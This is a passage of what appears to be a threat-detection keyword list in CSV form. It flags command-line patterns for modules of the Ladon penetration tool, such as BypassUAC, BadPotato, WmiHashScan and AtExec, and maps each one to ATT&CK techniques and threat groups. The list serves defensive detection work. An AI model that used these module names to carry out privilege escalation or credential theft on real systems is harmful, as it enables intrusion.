- TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *SshScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *TomcatScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *VncScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *WebScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *WinrmScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *WmiHashScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon *WmiScan*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ActiveAdmin*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ActiveGuest*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon AdiDnsDump *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon at c:*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon AtExec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon AutoRun*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon BadPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon BypassUAC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon CheckDoor*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Clslog*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon CmdDll *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon cmdline*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon CVE-*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon DirList*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 